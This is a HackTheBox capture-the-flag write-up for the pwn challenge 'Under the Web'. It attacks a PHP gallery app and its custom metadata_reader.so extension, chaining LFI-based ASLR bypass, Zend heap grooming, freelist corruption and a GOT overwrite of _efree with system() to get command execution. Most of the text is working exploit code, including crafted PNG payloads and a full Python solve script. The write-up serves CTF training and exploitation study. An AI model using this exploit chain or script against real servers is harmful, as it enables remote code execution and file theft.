pwnfreehard

Under the Web

hackthebox

Task: PHP gallery app with custom C extension (metadata_reader.so) that reads PNG tEXt chunks via strcpy into 56-byte emalloc buffers with no bounds check; LFI in view.php; flag at unknown SHA256-hashed path. Solution: ASLR bypass via /proc/self/maps LFI, heap grooming, Zend MM freelist corruption via strcpy overflow to GOT-overwrite _efree with system(), RCE to list directory, then LFI to read flag.

$ ls tags/ techniques/
lfi_arbitrary_file_readaslr_bypass_via_proc_self_mapszend_mm_freelist_corruptionheap_groominggot_overwrite_via_heap_overflowrce_via_efree_to_systemshell_comment_truncation

Under the Web — HackTheBox

Description

Dive deep under the web's surface, where 'L' in LFI stands for 'LEAK'. Will you conquer the depths and claim victory?

A PHP gallery web application runs on PHP 8.2.12's built-in development server (single process) with a custom C extension metadata_reader.so that provides a getImgMetadata() function. The extension reads PNG tEXt chunks (Title, Artist, Copyright) and returns them as a formatted string. The flag file is renamed to a SHA256 hash during Docker build, so the filename must be discovered at runtime.

Key files:

  • index.php — gallery page listing uploads/*.png, calls getImgMetadata() on each
  • upload.php — uploads PNG files (checks magic bytes + .png extension, no .. in path), calls getImgMetadata() on uploaded file
  • view.php — LFI via file_get_contents(urldecode($_GET['image'])) — reads arbitrary files
  • metadata_reader.so — PHP extension with heap buffer overflow vulnerability
  • start.sh — runs php -S 0.0.0.0:8000 -dextension=./metadata_reader.so in a while true loop (auto-restart on crash)

Analysis

Architecture

The PHP built-in web server is single-process — all requests are handled sequentially by the same process. This means heap state persists between requests, which is critical for heap grooming and exploitation.

Vulnerability #1: LFI in view.php

$image = urldecode($_GET['image']); if (file_exists($image)) { echo '<img src="data:image/png;base64,' . base64_encode(file_get_contents($image)) . '">'; }

Double URL-encoding bypasses any path restrictions. Can read any file on the filesystem if the path is known. Used for ASLR bypass (/proc/self/maps) and flag retrieval.

Vulnerability #2: Heap Buffer Overflow in metadata_reader.so

The getImgMetadata() function (at offset 0x1300 in the .so) processes PNG tEXt chunks with a critical flaw:

// For each Title/Artist/Copyright tEXt chunk: md->Title = (char *)_emalloc_56(); // allocates exactly 56 bytes strcpy(md->Title, text); // NO BOUNDS CHECK — text from PNG can be arbitrary length

The MetaData struct is also 56 bytes, allocated from the same Zend MM bin:

struct MetaData { // offset size char *Artist; // 0x00 8 char *Title; // 0x08 8 char *Copyright; // 0x10 8 char *PngName; // 0x18 8 png_structp png_ptr; // 0x20 8 png_infop info_ptr; // 0x28 8 png_textp text_ptr; // 0x30 8 }; // 0x38 = 56 bytes — SAME bin as text buffers!

Because MetaData and text buffers share the same 56-byte Zend MM bin, they are adjacent in memory. A strcpy overflow from a text buffer directly corrupts the free list pointer of the next free slot in the same bin.

Vulnerability #3: Uninitialized Heap Pointers

_emalloc_56() does NOT zero memory. Only md->PngName is initialized after allocation. If a PNG has no Title/Artist/Copyright tEXt chunks, stale pointers from previous allocations are dereferenced by snprintf (info leak) and efree (heap corruption).

Exploitation Primitive

The output section processes fields in fixed order — Title, Artist, Copyright — and calls efree() on each:

// 1. Title snprintf(Card + strlen(Card), 0x100 - strlen(Card), "Title: %s\n", md->Title); efree(md->Title); // ← if _efree GOT is overwritten with system(), this becomes system(md->Title) // 2. Artist snprintf(..., "Artist: %s\n", md->Artist); efree(md->Artist); // 3. Copyright snprintf(..., "Copyright: %s\n", md->Copyright); efree(md->Copyright); // 4. Struct efree(md);

The extension has partial RELRO.got.plt entries are writable. The _efree GOT entry at offset 0x4090 from the extension base can be overwritten with system().

Solution

Phase 1: ASLR Bypass via LFI

Read /proc/self/maps through the LFI in view.php to extract base addresses:

data = view_lfi(target, "/proc/self/maps") maps_text = data.decode() for line in maps_text.split("\n"): if "metadata_reader" in line and "r--p 00000000" in line: ext_base = int(re.match(r"([0-9a-f]+)-", line).group(1), 16) if "libc.so.6" in line and "r--p 00000000" in line: libc_base = int(re.match(r"([0-9a-f]+)-", line).group(1), 16) efree_got = ext_base + 0x4090 # _efree GOT entry in metadata_reader.so system_addr = libc_base + 0x4C3A0 # system() in libc

Both addresses must have no null bytes in their first 6 bytes (strcpy constraint). In practice, 64-bit Linux user-space addresses in the 0x7fXXXXXXXXXX range satisfy this.

Phase 2: Heap Grooming

Upload a normal PNG with Title/Artist/Copyright text chunks (50 bytes each) to populate the 56-byte Zend MM bin with known allocations and establish a predictable free list state:

png_groom = create_png(texts=[ ("Title", "G" * 50), ("Artist", "G" * 50), ("Copyright", "G" * 50), ]) upload(target, png_groom, "groom.png")

After this request completes, the free list in the 56-byte bin has a known LIFO order: md → Copyright_buf → Artist_buf → Title_buf → ...

Phase 3: GOT Overwrite via Heap Overflow

Upload a crafted exploit PNG with three tEXt chunks that chain together to overwrite the _efree GOT entry:

# Shell command padded to exactly 56 bytes (fills the emalloc buffer) command = b"ls /app/ > /app/uploads/ls.txt #" command_padded = command + b"A" * (56 - len(command)) # Title: 56 bytes (fills buffer) + 6 bytes (overflow into next slot's free list pointer) title_data = command_padded + efree_got_bytes # Artist: normal padding (consumes the regular free slot, leaving corrupted pointer as next head) artist_data = b"X" * 50 # Copyright: system() address (6 bytes) — written to the GOT via corrupted free list copyright_data = system_addr_bytes

How the overflow chain works:

  1. Title allocation: emalloc(56) returns a free slot. strcpy writes 62 bytes — 56 fill the buffer, 6 overflow into the next free slot's Zend MM free list pointer, replacing it with the _efree GOT address.

  2. Artist allocation: emalloc(56) returns the next normal free slot (the one whose free list pointer was just corrupted). After this allocation, the free list head now points to the _efree GOT address.

  3. Copyright allocation: emalloc(56) follows the corrupted free list and returns the GOT address as a writable buffer. strcpy writes the 6-byte system() address there, overwriting the _efree GOT entry.

Phase 4: Code Execution

When the output section runs efree(md->Title), it now calls system() with the Title buffer as the argument:

system("ls /app/ > /app/uploads/ls.txt #AAAAAAAAAAAAAAAAAAAAAAAAA\x90\xf0...")

The # character in the shell command comments out all the binary garbage (padding + GOT address bytes) that follows, so the command executes cleanly. The directory listing of /app/ is written to /app/uploads/ls.txt.

The server crashes after the GOT corruption but auto-restarts via the while true loop in start.sh.

Phase 5: Flag Retrieval

  1. Wait for server restart, then read the directory listing via LFI:
data = view_lfi(target, "/app/uploads/ls.txt") listing = data.decode() # Find SHA256 hash filename (64 hex characters) flag_hash = re.findall(r"[a-f0-9]{64}", listing)[0]
  1. Read the flag file:
flag_data = view_lfi(target, f"/app/{flag_hash}") flag = flag_data.decode().strip()

Full Solve Script

#!/usr/bin/env python3 """ Under the Web - HackTheBox PWN Challenge Exploit: LFI ASLR bypass → Heap overflow → GOT overwrite → RCE → Flag """ import struct import zlib import sys import requests import re import base64 import time def create_png_chunk(chunk_type, data): chunk = chunk_type + data crc = struct.pack(">I", zlib.crc32(chunk) & 0xFFFFFFFF) length = struct.pack(">I", len(data)) return length + chunk + crc def create_png(texts=None, width=1, height=1): png = b"\x89PNG\r\n\x1a\n" ihdr_data = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0) png += create_png_chunk(b"IHDR", ihdr_data) if texts: for keyword, value in texts: if isinstance(keyword, str): keyword = keyword.encode() if isinstance(value, str): value = value.encode() png += create_png_chunk(b"tEXt", keyword + b"\x00" + value) raw_data = b"\x00" + b"\xff\x00\x00" * width compressed = zlib.compress(raw_data * height) png += create_png_chunk(b"IDAT", compressed) png += create_png_chunk(b"IEND", b"") return png def upload(url, png_data, filename): files = {"file": (filename, png_data, "image/png")} try: return requests.post(f"{url}/upload.php", files=files, timeout=10) except Exception as e: print(f" Upload error: {e}") return None def view_lfi(url, path): resp = requests.get(f"{url}/view.php", params={"image": path}, timeout=10) b64 = re.findall(r"base64,([A-Za-z0-9+/=]+)", resp.text) if b64 and b64[0]: return base64.b64decode(b64[0]) return None def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") sys.exit(1) target = sys.argv[1].rstrip("/") print(f"[*] Target: {target}") # Phase 1: ASLR bypass via LFI print("\n[Phase 1] Leaking addresses via LFI (/proc/self/maps)") data = view_lfi(target, "/proc/self/maps") if not data: print("[-] Failed to read /proc/self/maps") sys.exit(1) maps_text = data.decode() ext_base = libc_base = None for line in maps_text.split("\n"): if "metadata_reader" in line and "r--p 00000000" in line: match = re.match(r"([0-9a-f]+)-", line) if match: ext_base = int(match.group(1), 16) if "libc.so.6" in line and "r--p 00000000" in line: match = re.match(r"([0-9a-f]+)-", line) if match: libc_base = int(match.group(1), 16) if not ext_base or not libc_base: print("[-] Failed to find required addresses") sys.exit(1) efree_got = ext_base + 0x4090 system_addr = libc_base + 0x4C3A0 print(f" metadata_reader.so base: 0x{ext_base:x}") print(f" libc base: 0x{libc_base:x}") print(f" _efree GOT: 0x{efree_got:x}") print(f" system(): 0x{system_addr:x}") efree_got_bytes = struct.pack("<Q", efree_got)[:6] system_addr_bytes = struct.pack("<Q", system_addr)[:6] if b"\x00" in efree_got_bytes or b"\x00" in system_addr_bytes: print("[-] Address contains null bytes — exploit won't work with strcpy") sys.exit(1) # Phase 2: Heap grooming print("\n[Phase 2] Grooming heap") png_groom = create_png(texts=[ ("Title", "G" * 50), ("Artist", "G" * 50), ("Copyright", "G" * 50), ]) resp = upload(target, png_groom, "groom.png") if not resp or resp.status_code != 200: print("[-] Grooming failed") sys.exit(1) print(" [+] Heap groomed") # Phase 3: GOT overwrite exploit print("\n[Phase 3] Sending exploit PNG (GOT overwrite)") command = b"ls /app/ > /app/uploads/ls.txt #" command_padded = command + b"A" * (56 - len(command)) title_data = command_padded + efree_got_bytes artist_data = b"X" * 50 copyright_data = system_addr_bytes png_exploit = create_png(texts=[ ("Title", title_data), ("Artist", artist_data), ("Copyright", copyright_data), ]) resp = upload(target, png_exploit, "exploit.png") if resp: print(f" Response: {resp.status_code} ({len(resp.text)} bytes)") else: print(" Server crashed (expected — exploit triggered)") # Wait for server restart print(" Waiting for server restart...") time.sleep(3) for _ in range(10): try: resp = requests.get(f"{target}/", timeout=5) if resp.status_code == 200: print(" [+] Server is back") break except: time.sleep(1) # Phase 4: Read directory listing and find flag print("\n[Phase 4] Reading directory listing") data = view_lfi(target, "/app/uploads/ls.txt") if not data: print("[-] ls.txt not found — exploit may have failed") sys.exit(1) listing = data.decode("utf-8", errors="replace") print(f" /app/ directory listing:\n{listing}") hashes = re.findall(r"[a-f0-9]{64}", listing) if not hashes: print("[-] No SHA256 hash found in directory listing") sys.exit(1) flag_hash = hashes[0] print(f"\n [+] Flag file hash: {flag_hash}") # Phase 5: Read the flag print("\n[Phase 5] Reading flag") flag_data = view_lfi(target, f"/app/{flag_hash}") if not flag_data: print("[-] Failed to read flag file") sys.exit(1) flag = flag_data.decode("utf-8", errors="replace").strip() print(f"\n{'=' * 60}") print(f" FLAG: {flag}") print(f"{'=' * 60}") if __name__ == "__main__": main()

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md